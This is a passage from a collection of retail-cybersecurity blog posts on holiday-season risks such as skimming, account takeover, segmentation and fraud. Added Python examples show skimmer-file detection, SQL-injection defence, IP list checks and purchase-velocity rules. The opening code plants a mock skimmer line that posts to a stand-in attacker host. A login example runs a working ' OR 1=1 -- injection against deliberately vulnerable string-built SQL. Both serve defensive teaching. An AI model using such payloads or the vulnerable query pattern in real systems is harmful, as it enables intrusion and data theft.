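            "function pay(){ fetch('https://attacker.invalid/c', {method:'POST'}) }"
        )
        (Path(root) / "js" / "jquery-legacy.js").write_text("/* dropped by attacker */")
        after = build_baseline(root)
    return diff_baseline(before, after)


if __name__ == "__main__":
    print(demo())
```

In production, take the baseline from the deployment pipeline after each legitimate release, store it off the web server so an intruder cannot rewrite it, and run the diff on a schedule: any added or modified file in a served directory that does not correspond to a release is a candidate skimmer injection and should page someone.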

Account takeover (ATO), which occurs when a threat actor gains unauthorized access to an online account that belongs to someone else, can also affect e-commerce customers. With access to shoppers’ accounts, fraudsters can wreak havoc by stealing stored payment data, making fraudulent purchases and rerouting existing orders to a different address, for example.

Unauthorized access requires legitimate credentials, which criminals can obtain through a variety of tactics. The most common methods include phishing, brute-forcing weak passwords and launching SQL injection attacks against the web application itself.

You can help mitigate these threats by practicing good network hygiene. Here are some useful tips retailers can apply today to lower the risk of user account compromises:

  • Employ the most recent patches for all hardware, internal and external software, network communication protocols, and database security protocols.
  • Sanitize user input to prevent injection attacks.
  • Prioritize patching for the threats most relevant to your organization. Look out for the most-exploited vulnerabilities and ensure that internet-facing servers and systems are up to date.
  • Always consult your local computer emergency response team (CERT), IBM X-Force Exchange and other threat intelligence sources to gather the latest news on vulnerabilities and mitigation techniques.
  • Enforce multifactor authentication (MFA) for employees.
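The following Python example is added here and is not taken from the original article. It puts a string-built login query beside its parameterized form against an in-memory SQLite table, to show what "sanitize user input to prevent injection attacks" means in practice. The user name, password and table layout are constructed; the classic `' OR 1=1 --` payload logs in through the first version and fails against the second.

```python
"""Login lookup: string-built SQL beside the parameterized form.

Added example, not code from the original article. The users table and the
account in it are constructed; the unsalted SHA-256 keeps the example short.
"""
import hashlib
import hmac
import sqlite3


def sha256_hex(password: str) -> str:
    return hashlib.sha256(password.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """In-memory user store with a single constructed account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, pw_hash TEXT NOT NULL)")
    conn.execute("INSERT INTO users VALUES (?, ?)", ("alice", sha256_hex("Winter2018!")))
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Builds the WHERE clause from raw input, so the caller controls the SQL grammar.

    A username of  ' OR 1=1 --  turns the statement into
      ... WHERE username = '' OR 1=1 --' AND pw_hash = '...'
    and the password check is commented out entirely.
    """
    query = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND pw_hash = '" + sha256_hex(password) + "'"
    )
    return conn.execute(query).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Binds the username as a parameter and compares the hash in constant time."""
    row = conn.execute(
        "SELECT pw_hash FROM users WHERE username = ?", (username,)
    ).fetchone()
    if row is None:
        # Do a comparison anyway so unknown and known usernames take similar time.
        hmac.compare_digest(sha256_hex(password), sha256_hex(""))
        return False
    return hmac.compare_digest(sha256_hex(password), row[0])


if __name__ == "__main__":
    db = make_db()
    payload = "' OR 1=1 --"
    print("vulnerable, injected:", login_vulnerable(db, payload, "anything"))
    print("safe, injected:      ", login_safe(db, payload, "anything"))
    print("safe, real creds:    ", login_safe(db, "alice", "Winter2018!"))
```

The bound parameter in login_safe() is passed to SQLite as data, never parsed as SQL, which is the whole fix; escaping quotes by hand is the fragile alternative that this control replaces. For a real deployment, store salted, slow hashes (PBKDF2, bcrypt or Argon2) instead of plain SHA-256 and lock or step-up accounts after repeated failures, which addresses the brute-force route to account takeover mentioned above.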

3. Go to Your Separate Corners

Cybercriminals are always leveraging new ways to steal payment card data and correlate it with PII. Elevated volumes of web traffic during the holiday season provide attackers with even more targets and opportunities.

To help keep customer data safe, even in cases where criminals manage to infiltrate assets, security teams should keep PII, financial data and POS information separate by segmenting enterprise networks. By keeping this information separated and encrypted, attackers will find it much harder to correlate data on customers. While segmenting a network can be an intensive process, it’s a small price to pay to keep customer data safe.

Within each segment, allow only the specific hosts that need to reach the payment systems to do so, and alert on any other source address. An attacker can spoof or borrow an address, but a tightly scoped allow list still exposes most intruders quickly. Here are some other best practices to consider:

  • Conduct internal audits for segment crossover to ensure that segregated data sets do not get mixed over time and appear in other places on the network, which can help attackers with identity theft.
  • Deploy web application firewalls (WAFs) to help ensure that incoming traffic is filtered, monitored and blocked to and from web applications to mitigate threats such as cross-site scripting (XSS) and SQL injection.
  • As a secondary measure, a firewall should be implemented to effectively govern all traffic coming in and out of the network. Firewall configuration is a key element in its effectiveness and should be performed by a certified network technician.
  • Have administrative users log in with a lower privilege level before escalating their privileges to perform updates and maintenance.
  • Prevent sensitive users and systems from communicating with the internet.

4. Learn From History and Educate Users

Nearly every company has some kind of data protection training in place. To make employee training programs more effective, organizations must recognize that employees often click through training materials as fast as possible so they can get back to work. So how can an organization effectively educate its users?

  • Plan for role-based training of all employees in the organization.
  • Train employees on both physical and digital security.
  • Conduct short training sessions and field-test them by asking for employee feedback.
  • Launch an internal phishing campaign: Send a spoofed email from a dummy account with official-sounding names, titles and subjects, and track the number of users who click on the links or attachments. Offer additional training according to the conclusions from the campaign.
  • Identify users who need remedial training and retest as needed.
  • Most importantly, provide all users with an easily accessible resource to report issues. Users should be able to contact IT security with any question or suspicion.

For education to be effective, it has to be repetitive and stay top-of-mind for users across the entire organization. Get management to support awareness campaigns and find opportunities to educate users. Having vigilant employees makes mitigating attacks during the holiday season that much more effective. Frequent email reminders, illustrative posters and communicating best practices during team meetings can demonstrate your organization’s commitment to secure day-to-day conduct. Giving users personalized attention can go a long way toward making the message resonate with them — for example, you might consider gifting a security-themed mug for the holiday season.

5. Use Network IP Whitelists and Blacklists

Whitelists are IP addresses or domains that are explicitly permitted to connect; blacklists are IP addresses or domains that are explicitly blocked from entering the network. Used together, they control which connections may enter or leave the network. Keeping these lists up-to-date demands some diligence, but they can be crucial to boosting network security.

Filtering IPs according to these lists is more suitable for enterprises that do not manage e-commerce activity, since e-commerce companies have to accept inbound requests from all over the world, especially during the holiday shopping season.

These lists are much easier to maintain for networks that do not face external customers because blacklists can be used on both inbound and outbound access to help block known malicious hosts from communicating or accessing the organization’s data and assets. Below are some basic tips for filtering hosts:

  • Blacklist any IP addresses known to be malicious. Constantly updated lists can be fed into security solutions directly from threat intelligence platforms.
  • Should a blacklisted IP address have legitimate reasons for communicating with the network, investigate, confirm and allow access via the whitelist.
  • Whitelists should include any internal company addresses.
  • Whitelists should exclude any websites that are not relevant for employees carrying out their daily tasks (e.g., social media, webmail, etc.).
  • It is imperative to verify these lists periodically to help ensure that all information is accurate.
  • Should any IP address on the whitelist become outdated, it should be promptly removed or moved to the blacklist.
  • Keeping allowed and banned IP addresses from becoming intermingled is a basic premise of effective whitelist/blacklist practices.
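Here is an added Python example (not from the original article) of the list hygiene described in the bullets above: it parses allow and deny entries that may be single addresses or CIDR blocks, flags any range that appears on both lists, and makes a fail-closed decision for a given address. The ranges and addresses are constructed from reserved documentation blocks; the stale 10.20.30.0/24 deny entry is there to show the conflict check firing.

```python
"""Allow/deny list matching with overlap detection.

Added example, not code from the original article. The entries and the
sample addresses below are constructed from reserved documentation ranges.
"""
import ipaddress

# Constructed lists: single addresses or CIDR blocks, '#' starts a comment.
ALLOW_ENTRIES = [
    "# internal company ranges",
    "10.0.0.0/8",
    "# payment processor egress, confirmed with the vendor",
    "203.0.113.10",
]
DENY_ENTRIES = [
    "# known-bad ranges from a threat intelligence feed",
    "198.51.100.0/24",
    "10.20.30.0/24",  # stale entry that now collides with the internal allow range
]


def parse_list(entries):
    """Normalise text entries into network objects; a bare address becomes a /32 or /128."""
    nets = []
    for line in entries:
        line = line.split("#", 1)[0].strip()
        if line:
            nets.append(ipaddress.ip_network(line, strict=False))
    return nets


def find_conflicts(allow, deny):
    """(allow, deny) pairs that overlap: each one is a list-hygiene error to resolve."""
    return [(a, d) for a in allow for d in deny if a.version == d.version and a.overlaps(d)]


def classify(addr: str, allow, deny) -> str:
    """Decide for one address; an address on both lists is refused until reconciled."""
    ip = ipaddress.ip_address(addr)
    in_allow = any(ip in n for n in allow)
    in_deny = any(ip in n for n in deny)
    if in_allow and in_deny:
        return "conflict"
    if in_deny:
        return "deny"
    if in_allow:
        return "allow"
    return "unlisted"


def demo() -> dict:
    allow, deny = parse_list(ALLOW_ENTRIES), parse_list(DENY_ENTRIES)
    samples = ("10.1.2.3", "10.20.30.5", "198.51.100.7", "203.0.113.10", "192.0.2.1")
    return {
        "conflicts": [(str(a), str(d)) for a, d in find_conflicts(allow, deny)],
        "decisions": {ip: classify(ip, allow, deny) for ip in samples},
    }


if __name__ == "__main__":
    print(demo())
```

Run find_conflicts() every time a feed updates the deny list, before the lists are pushed to enforcement points; that is the periodic verification the bullets call for. What "unlisted" should mean depends on where the lists sit: for an e-commerce front end it has to mean allow, which is why the article limits strict filtering to networks that do not face external customers, while for corporate egress it should mean deny.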

Stay Tuned for More Holiday Season Tips for Retailers

There is no such thing as unimportant data. Take every necessary precaution to help protect enterprise and customer data by implementing strong retail cybersecurity controls, educating users and following current best practices. Maintaining customer confidence in your ability to protect their PII can result in more business, increased customer loyalty and stronger organizational reputation.

Stay tuned for five more tips to help retailers stay secure this holiday season.


The post 5 Recommendations to Improve Retail Cybersecurity This Holiday Season appeared first on Security Intelligence.

Why Is the Retail Industry Still Lacking Security?

As another busy shopping season kicks into high gear, many of us will head to online retail sites and apps to check items off our holiday gift lists. Security leaders should be mindful that employees who shop while at work put sensitive data, and possibly the corporate network, at risk, because retail industry sites and systems are too often poorly secured.

A recent survey from third-party risk management firm SecurityScorecard found that retail is among the lowest-ranked industries in terms of its security stance. The report looked at 1,444 domains in the industry with an IP footprint of at least 100 and found that retail had the second-lowest app security performance among major sectors, outperforming only the entertainment industry. What are retailers doing wrong?

Why Can’t Retailers Make the Grade?

“This year the retail industry’s security posture fell lower than in years past, both in application security and social engineering,” Fouad Khalil, head of compliance at SecurityScorecard, said in a press release. “To remain competitive, retailers are adopting new payment and digital technologies, exposing them as prime targets for cybercriminals.”

Despite the establishment of the Payment Card Industry Data Security Standard (PCI DSS) in 2004, SecurityScorecard found that many retailers largely ignore it. More than 90 percent of the retail domains analyzed showed signs of noncompliance with the standard. Retailers found to be out of compliance face steep financial penalties if they are breached.

“As organizations assess their compliance with PCI DSS, they must be able to detect, remediate and recover from any threats or vulnerabilities adding risk to unauthorized access to CDE,” said Khalil in response to the findings.

Listen to the podcast: Examining the State of Retail Security

The Customer Experience Trumps Retail Security

Convenience and the user experience have always contributed to poor retail app security, noted Ron Schlecht, managing partner at cybersecurity consulting firm BTB Security.

“The focus is so much on how technology fills or creates business value, that security is oftentimes an afterthought,” he said. “The only true way to get ahead of this issue in this industry and to protect itself from an increasing level of sophistication in attacks is executive buy-in to the issue, as well as a cohesive security strategy at each organization to make this a priority.”

In an extremely competitive sales landscape, retailers still place precedence on what users want, and front-end ease of transaction wins over back-end retail app security. As a result, according to Mike Wilson, chief technology officer (CTO) of PasswordPing, merchants are reluctant to implement security measures that could get in the way of making a sale.

“Any ‘fraud-proof’ e-commerce solution would need to include so many obstacles to block bad actors that real customers would find it practically impossible to complete a transaction,” said Wilson. “Many industries are able to apply security solutions that add some friction to their user experience in exchange for better security, but the retail industry knows that their consumers will go elsewhere if it’s not a seamless experience.”

Attackers Exploit Poor Security Awareness in Retail

Retailers have historically displayed little awareness about security. Despite numerous high-profile breaches over the years that have impacted major merchants, that dearth of understanding continues to cause problems.

The SecurityScorecard report noted that social engineering scams that target retailers are on the rise and ranked the industry last in security against such threats. As retail becomes increasingly digital, this trend could become even worse.

“The way we shop has changed drastically in the last few years,” said Migo Kedem, senior director of product at SentinelOne. “Retail is traditionally a low-tech business. The new technology brings new security challenges, and these ‘digital shoplifters’ can’t be simply scared away using security sensors. The current way of life requires a different security approach that can protect your assets from cyberthreats.”

Scott Swenka, an IT security specialist working for a large grocery chain, believes a lack of security-minded leadership is causing the industry to fall behind others when it comes to risk mitigation.

“They lag behind because most public retail organizations have boards that are built out of retail-based leaders and simply do not have an understanding of technology and how it affects them,” he said.

How Can Retailers Catch Up?

While PCI does not appear to have improved security in retail, regulations that target point-of-sale (POS) systems have the potential to make a measurable impact in the future, said Jim Barkdoll, CEO at security vendor TITUS.

“Regulation will force the necessary cultural shift in how retailers approach security,” he predicted. “Even those that have had a breach tend to relax their focus on security practices after the public attention around their breach wanes, driving long-term security investments lower on their list of priorities. Regulation changes that and will force a continued and consistent adherence to security policies and practices.”

Security leaders at retail organizations can address this problem by practicing secure development and operations (DevSecOps) and monitoring emerging threats in the digital landscape. If developers build retail apps with security baked in from the beginning of the development process, retail systems will gradually become more secure from the ground up.

Data should be encrypted during system communication and storage, and apps should employ authentication between the app and its servers. Apps should also require customer authentication via factors such as one-time passwords (OTP) and biometrics.

As is the case in many industries, most retail organizations prioritize innovation and customer retention before security. But as consumers become more concerned about their own digital security and privacy, retailers must invest in new security technologies and practices and lean on industry experts to help build secure systems.


The post Why Is the Retail Industry Still Lacking Security? appeared first on Security Intelligence.

Retail Security Hygiene: The Case for Seasonal Checkups

The winter holidays offer big potential for retailers, with some companies earning around 30 percent of their annual revenue during the season, according to the National Retail Federation. Big sales numbers, however, also drive increased risks of fraud and theft, and businesses are now spending on extra security measures to keep physical stores safe.

But this is only half the battle. With retail stores moving online and hiring seasonal staff to bridge the holiday gap — not to mention handling employees who are more focused on holiday breaks than network breaches — it’s worth taking stock of retail security hygiene and revisiting how to protect consumer data from opportunistic cybercriminals.

Here’s how a seasonal hygiene checkup can help mitigate three top retail risks.

Fight E-Commerce Fraud During the Holiday Season

Online fraud jumps during the holiday season. As reported by PYMNTS, while total transactions rose 19 percent, online fraud increased by 22 percent from Thanksgiving to the end of 2017. There’s no single point of fraud failure across retail e-commerce stores, but threat actors continue to prioritize phishing emails as the primary point of compromise. If attackers can convince customers or employees to open attachments or follow malicious links, both purchase fraud and network infection are possible.

So how can companies assess their current security hygiene around e-commerce? It starts with simple questions: What do common attacks look like? What are the likely threat vectors? What are the potential costs? If retail organizations aren’t sure of the answers, they’ve got work to do. As U.S. Attorney Erin Nealy Cox wrote in Forbes, companies should create common threat profiles that allow IT teams to focus on vulnerable areas and develop specific countermeasures.

Simple processes — such as locking accounts after multiple failed login attempts and putting a limit on multiple purchases made over short timespans — can help, but it’s also a good idea to leverage automated, real-time fraud detection solutions to help identify attack patterns and reduce total risk.

Seasonal Staffing Concerns

To handle seasonal crowds without compromising customer service, many organizations hire extra staff during the holidays. According to Retail Dive, experts predict that retailers will bring on 650,000 seasonal employees to help offset consumer demand this year. To do their jobs, seasonal workers need access to point-of-sale (POS) networks, checkout systems and any mobile applications used by the company. This is the next hygiene shortfall for many companies: Hiring new employees without effective security onboarding and offboarding.

Consider a staff member who receives access to POS systems that are connected to back-end corporate networks. Inadequate training has them leaving sessions open and sharing passwords with co-workers, while minimal offboarding means they may retain login details and/or remain on internal permissions lists. As noted by Channel Partners Online, better security in this case starts with segmentation: POS and other sales systems should always be logically separated from other network services to prevent unintentional — or malicious — compromise.

Identity and access management (IAM) tools are also critical. IT teams need a way to control access for all retail workers — even those employed for only a few months — at a granular level to help protect consumer financial data and corporate intellectual property (IP). By assigning seasonal workers access roles with privileges that allow the completion of day-to-day tasks but don’t permit extraneous activity, retailers can boost both in-store and online security. Additionally, IAM solutions make it easy for network administrators to remove seasonal accounts and privileges when the holidays are over.

How to Protect Consumer Data From Insider Threats

No seasonal security checkup is complete without taking stock of internal employee risks. While Security Magazine noted that 75 percent of these insider threats are accidental, they’re no less risky to retail bottom lines, especially if users accidentally give threat actors complete access to network resources.

Improving security starts with a look at employee time off. Are workers putting in extra hours, pulling double shifts or working straight through the holidays? As noted by Harvard Business Review, 94 percent of employees who take time off for vacation come back to work with more energy and a better outlook. This may not be possible for retail companies during the holiday season, in turn lowering productivity and putting organizations at risk. It’s also worth assessing the number of employees working from home. As the holidays approach and weather gets worse, more and more employees may opt for home offices instead of slippery commutes. But are they logging into network services safely?

The first step for better internal security is to implement two-factor authentication (2FA). A second factor limits what an attacker can do with credentials captured after a distracted employee clicks an infected link or opens a malware-laden attachment. It’s also a good idea to invest in virtual private networks (VPNs) and other network safeguards to help prevent bad actors from eavesdropping on remote workers. Email management solutions, meanwhile, can prevent messages with sensitive attachments from leaving secure corporate environments.

Give the Gift of a Security Hygiene Checkup

With the winter holiday season already upon us, retail companies would be wise to conduct a quick, but thorough security hygiene checkup. Start as early as possible to make it easier to identify key threats across e-commerce systems, seasonal staffing policies and employee behaviors. Then, develop a formal process to address these issues and improve security outcomes. This prevents security best practices from sitting on a shelf while retail risks rack up, and provides a blueprint for technology deployment and implementation.

Listen to the podcast: Examining the State of Retail Security

The post Retail Security Hygiene: The Case for Seasonal Checkups appeared first on Security Intelligence.

Cyber Monday 2018: 5 Best Practices to Protect Consumer Data

Cyber Monday is coming. Last year, the online shopping event generated $6.6 billion, according to Forbes, and marked “the largest online shopping day in U.S. history.” According to CNBC, consumer spending is up strongly this year, suggesting that Cyber Monday 2018 could be another record-breaker.

Given the sheer number of customers, websites and companies that drive Cyber Monday success, consumers and businesses need to make sure security doesn’t get lost in the hustle and bustle. Cybercriminals are hoping that in all the commotion they can compromise user accounts, infect corporate websites and crack business networks.

With customers expecting both great sales and solid security, organizations must improve their data protection practices and implement effective defense strategies ahead of the online onslaught.

Listen to the podcast: The State of Retail Cybersecurity Ahead of the 2018 Holiday Season

Why Retailers Must Adapt to the Evolving Landscape

Although Cyber Monday only started in 2005, the online sales frenzy has almost caught up to Black Friday in sheer sales numbers. Increasing familiarity with e-commerce stores and trust in digital transactions are paving the way. Fortune reported that more than 174 million American shoppers participated both online and in-store over the last Black Friday/Cyber Monday weekend — meaning that opportunities abound for attackers across platforms.

It’s up to retailers to justify and preserve the comfort levels that are driving their success. If cybercriminals are able to infiltrate smartphones and desktops with malware and phishing emails, consumers may unwittingly hand over account credentials and financial information. If companies can’t secure e-commerce portals, fraudsters could gain visibility into all transactions or place fraudulent orders and charge them to unsuspecting customers.

For retail companies, the trend is clear: Cyber Monday interest is on the rise among both consumers and criminals, meaning it’s no longer an option to post great deals without great security to back them up. Now, the holiday season calls for greater cybersecurity vigilance than ever, supported by evolving information security best practices for retailers.

Watch for This Year’s Most Common Scams

According to ACI Worldwide, fraud attempts are projected to increase 14 percent between Thanksgiving and Cyber Monday, with the average cost of fraudulent transactions rising 3 percent to $243. Meanwhile, the firm forecast the volume of purchases to increase by 18 percent as values rise by 19 percent.

Since more is at stake than ever for shoppers and retailers this season, cybercriminals are also varying their approaches, opting for omnichannel attacks across e-commerce sites, call centers, email accounts and in-store pickup programs, according to ACI Worldwide.

TechRadar reported that phishing attacks still account for half of all online fraud. That’s simply because they work: Well-crafted emails that convey a sense of urgency and create an emotional response can fool even experienced cybershoppers.

Meanwhile, Security Boulevard reported that threat actors also like to eavesdrop on insecure Hypertext Transfer Protocol (HTTP) sites and Wi-Fi to steal credentials and account information, leverage compromised devices to install keyloggers, and typosquat to create domain names that are very similar to popular Cyber Monday sites to collect and monetize consumer information.

5 Steps to Optimize Cyber Monday 2018 Protection

All the usual advice for consumer protection on Cyber Monday applies: Don’t save financial information on websites, watch out for email scams and avoid deals that are too good to be true. But retailers must hold up their end of the security deal as well.

Here are some security best practices for retailers to implement to keep consumers safe and protect corporate networks during the post-Thanksgiving shopping rush.

1. Account for Time

As noted by Forbes, cyberattackers don’t keep regular business hours. As a result, fraud rates may rise during off-peak traffic hours when there are fewer consumers shopping, but also fewer security personnel on duty.

Retailers should consider adding extra information security staff for the holiday season or implementing additional fraud checks for purchases made from different countries or after usual business hours.

2. Limit Purchase Velocity

Speed is another way malicious actors attempt to defraud Cyber Monday retailers. Instead of making high-value transactions that may be flagged as suspicious, attackers often make high-volume transactions — up to 10 times more quickly than legitimate users — to generate greater revenue.

Here, machine learning tools are invaluable assets to help identify and eliminate rapid-fire transactions.
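The two checks suggested in steps 1 and 2 (off-hours or out-of-country purchases, and purchase velocity) can be expressed as simple rules before any machine learning is involved. The following is an added example, not code from the original post or from any vendor mentioned in it; the business-hours window, home country, two-minute window and three-purchase limit are assumed thresholds, and the transactions are constructed sample data.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample transactions (not real data): timestamp, account, country, amount in USD.
SAMPLE = [
    ("2018-11-26 14:01:00", "acct-1", "US", 80.0),
    ("2018-11-26 14:09:00", "acct-1", "US", 45.0),
    ("2018-11-26 03:12:00", "acct-2", "US", 60.0),   # purchase in the middle of the night
    ("2018-11-26 15:00:00", "acct-3", "RO", 120.0),  # purchase from outside the home country
    ("2018-11-26 16:00:00", "acct-4", "US", 20.0),
    ("2018-11-26 16:00:20", "acct-4", "US", 25.0),
    ("2018-11-26 16:00:45", "acct-4", "US", 22.0),
    ("2018-11-26 16:01:10", "acct-4", "US", 30.0),   # fourth purchase inside two minutes
]

# Assumed policy values; a real deployment would tune these from its own traffic.
BUSINESS_HOURS = (8, 20)            # flag purchases outside 08:00-20:00 local time
HOME_COUNTRY = "US"
VELOCITY_WINDOW = timedelta(minutes=2)
VELOCITY_LIMIT = 3                  # more purchases than this per window is flagged


def time_and_geo_checks(when, country):
    """Step 1: extra scrutiny for off-hours and foreign purchases."""
    reasons = []
    if not (BUSINESS_HOURS[0] <= when.hour < BUSINESS_HOURS[1]):
        reasons.append("off-hours")
    if country != HOME_COUNTRY:
        reasons.append("foreign-country")
    return reasons


def flag_transactions(transactions):
    """Step 2: sliding-window velocity check per account, combined with step 1.

    Returns a list of (account, timestamp, reasons) for flagged purchases only.
    """
    recent = defaultdict(deque)     # account -> timestamps still inside the window
    flagged = []
    for ts, account, country, _amount in sorted(transactions):
        when = datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")
        reasons = time_and_geo_checks(when, country)
        window = recent[account]
        window.append(when)
        while when - window[0] > VELOCITY_WINDOW:   # drop purchases older than the window
            window.popleft()
        if len(window) > VELOCITY_LIMIT:
            reasons.append("velocity")
        if reasons:
            flagged.append((account, ts, reasons))
    return flagged
```

Flagged purchases would feed a step-up check (a one-time code, as in step 3) or a manual review queue rather than an automatic decline, since legitimate night-shift or travelling customers trigger the same rules.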

3. Authenticate Users

Authentication is critical to Cyber Monday security. With many users still using weak passwords across websites — many of which are stolen in phishing scams — retail companies should implement two-factor authentication (2FA) wherever possible. Even low-friction options such as email or mobile codes can significantly reduce fraud and boost consumer confidence.

4. Separate Infrastructure

With many retail merchants now deploying both online and in-store sales to capture customer attention across Thanksgiving weekend, there’s an emerging need to separate point-of-sale (POS) and corporate infrastructure. This ensures that in-store device breaches don’t compromise e-commerce sites, and vice versa.

5. Manage Permissions

Who has access to what, when and why? Threat actors often exploit the chaos associated with Cyber Monday to infiltrate networks, install keyloggers and wait. It’s time for retailers to implement effective identity and access management (IAM) solutions that permit granular, permissions-based assignments of roles and responsibilities to foil criminal attempts to breach corporate systems.

Attackers are gearing up for one of the most lucrative days of their year on Cyber Monday. For retailers, the combination of increased consumer spending and security expectations demands stringent security practices that account for common threat vectors, prioritize user authentication, separate infrastructure and effectively manage permissions inside and outside the enterprise.

Listen to the podcast: The State of Retail Cybersecurity Ahead of the 2018 Holiday Season

The post Cyber Monday 2018: 5 Best Practices to Protect Consumer Data appeared first on Security Intelligence.

Retail Cybersecurity Is Lagging in the Digital Transformation Race, and Attackers Are Taking Advantage

Digital transformation is dominating retailers’ attention — and their IT budgets. As a result, significant gaps in retail cybersecurity are left unfilled just as retail IT faces new challenges, from infrastructure moving to the cloud without clear security policies to an array of new threat vectors focused on personal customer information, ransomware and underprotected business-to-business (B2B) connections.

Just as with line-of-business functions like merchandising and operations, retailers’ cybersecurity functions must undergo a digital transformation to become more holistic, proactive and nimble when protecting their businesses, partners and customers.

Retailers Aren’t Prioritizing Security, and Attackers Are Exploiting the Gaps

According to the retail edition of the “2018 Thales Data Threat Report,” 75 percent of retailers have experienced at least one data breach in the past, with half seeing a breach in the past year alone. That puts retail among the most-attacked industries as ranked by the “2018 IBM X-Force Threat Intelligence Index.”

Underfunded security infrastructure is likely a big reason for this trend; organizations only dedicated an average of around 5 percent of their overall IT budgets to security and risk management, according to a 2016 Gartner report.

While retailers have done a great job addressing payment card industry (PCI) compliance, it has come at a cost to other areas. According to IBM X-Force Incident Response and Intelligence Services (IRIS) research, 78 percent of publicly disclosed point-of-sale (POS) malware breaches in 2017 occurred in the retail sector.

In addition to traditional POS attacks, malicious actors are targeting retailers with new threat vectors that deliver more bang for the buck, such as the following:

  • Personally identifiable information (PII) about customers — Attackers harvest this information through retailers’ B2C portals and use it in bot networks to create false IDs and make fraudulent transactions. An increasingly popular approach involves making purchases with gift cards acquired via fraud.
  • Ransomware — Criminals are exploiting poorly configured apps and susceptible end users to access and lock up data, so they can then extract pricey ransoms from targeted retailers.
  • Unprotected B2B vendor connections — Threat actors can gain access to retail systems by way of digital connections to their partners. A growing target is a retailer’s B2B portals that have been constructed without sufficient security standards.

What Are the Biggest Flaws in Retail Cybersecurity?

These new types of attacks take advantage of retailers’ persistent underfunding of critical security defenses. Common gaps include inadequate vulnerability scanning capabilities, unsegmented and poorly designed networks, and using custom apps on legacy systems without compensating controls. When retailers do experience a breach, they tend to address the specific cause instead of taking a more holistic look at their environments.

Retailers also struggle to attract security talent, competing with financial services and other deeper-pocketed employers. The National Institute of Standards and Technology (NIST) reported in 2017 that the global cybersecurity workforce shortage is expected to reach 1.5 million by 2019.

In addition, flaws in governance make retailers more vulnerable to these new types of security threats. To keep up with rapidly evolving consumer demands, many line-of-business departments are adopting cloud and software-as-a-service (SaaS) solutions — but they often do so without any standardized security guidance from IT.

According to the “2017 Thales Data Threat Report,” the majority of U.S. retail organizations planned to use sensitive data in an advanced technology environment such as cloud, big data, Internet of Things (IoT) or containers this year. More than half believed that sensitive data use was happening at the time in these environments without proper security in place. Furthermore, companies undergoing cloud migration at the time of a breach incur $12 per record in additional costs, according to the “2018 Cost of a Data Breach Study.”

To protect their data, retailers need tools to both identify security threats and escalate the response back through their entire infrastructure, including SaaS and cloud services. But many enterprises lack that response capability. What’s more, the “Cost of a Data Breach Study” found that using an incident response (IR) team can reduce the cost of a breach by around $14 per compromised record.

Unfortunately, cybersecurity is not always on the radar in retailers’ C-suites. Without a regularly updated cybersecurity scorecard that reflects an organization’s current vulnerability to attack, senior executives might not regularly discuss the topic, take part in system testing or see cybersecurity as part of business continuity.

3 Steps to Close the Gaps in Your Security Stance

Time isn’t stopping as retailers grapple with these threats. Retail cybersecurity leaders must also monitor the General Data Protection Regulation (GDPR), where compliance requirements are sometimes poorly understood, as well as the emergence of artificial intelligence (AI) in both spoofing and security response. In addition, retailers should keep an eye on the continued uncertainty about the vulnerability of platform-as-a-service (PaaS), microservices, cloud-native apps and other emerging technologies.

By addressing the gaps in their infrastructure, governance and staffing, retailers can more effectively navigate known threats and those that will inevitably emerge. Change is never easy, but the following three steps can help retailers initiate digital transformation and evolve their current approach to better suit today’s conditions:

1. Increase Budgets

According to Thales, 84 percent of U.S. retailers plan to increase their security spending. While allocating these additional funds, it’s important for retailers to take a more holistic view, matching budgets to areas of the highest need. Understanding the costs and benefits of addressing security gaps internally or through outsourcing is a key part of this analysis.

2. Improve Governance

Enacting consistent security guidelines across internally run systems as well as cloud- and SaaS-based services can help retailers ensure that they do not inadvertently open up new vulnerabilities in their platforms. Senior-level endorsement is an important ingredient in prioritizing cybersecurity across the enterprise. Regular security scorecarding can be a valuable tool to keep cybersecurity at the top of executives’ minds.

3. Invest in MSS

A growing number of retailers have realized that starting or increasing their use of managed security services (MSS) can help them achieve a higher level of security maturity at the same price as managing activities in-house, if not at a lower cost. MSS allow retailers’ internal cybersecurity to operate more efficiently, address critical talent shortages and enable retailers to close critical gaps in their current security stance.

Why Digital Transformation Is Critical to Rapid Response

Digital transformation is all about becoming more proactive and nimble to respond to consumers’ rapidly growing expectations for seamless, frictionless shopping. Retailers’ cybersecurity efforts require a similar, large-scale transition to cope with new threat vectors, close significant infrastructure gaps and extend security protocols across new platforms, such as cloud and SaaS. By rethinking their budgets, boosting governance and incorporating MSS into their security operations, retail security professionals can support digital transformation while ensuring the business and customer data remains protected and secure.


The post Retail Cybersecurity Is Lagging in the Digital Transformation Race, and Attackers Are Taking Advantage appeared first on Security Intelligence.